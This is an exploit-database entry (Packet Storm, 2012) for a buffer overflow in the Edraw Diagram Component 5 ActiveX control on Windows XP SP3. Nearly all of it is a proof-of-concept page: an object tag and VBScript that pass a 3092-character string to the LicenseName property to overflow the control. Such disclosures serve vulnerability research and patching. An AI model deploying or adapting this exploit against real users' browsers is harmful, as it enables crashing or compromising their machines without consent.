Edraw Diagram Component 5 Active-X Buffer Overflow

2012-02-05T00:00:00
ID PACKETSTORM:109449
Type packetstorm
Reporter Senator of Pirates
Modified 2012-02-05T00:00:00

Description

                                        
                                            `Author : Senator of Pirates  
This exploit tested on Windows Xp SP3 EN  
http://www.edrawsoft.com/download/EDBoardSetup.exe  
--------------------------------------------------------------------------------------------------------  
<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />  
<script language='vbscript'>  
targetFile = "C:\Program Files\edboard\EDBoard.ocx"  
prototype = "Invoke_Unknown LicenseName As String"  
memberName = "LicenseName"  
progid = "EDBoardLib.EDBoard"  
argCount = 1  
arg1=String(3092, "A")  
target.LicenseName = arg1  
</script>  
  
  
`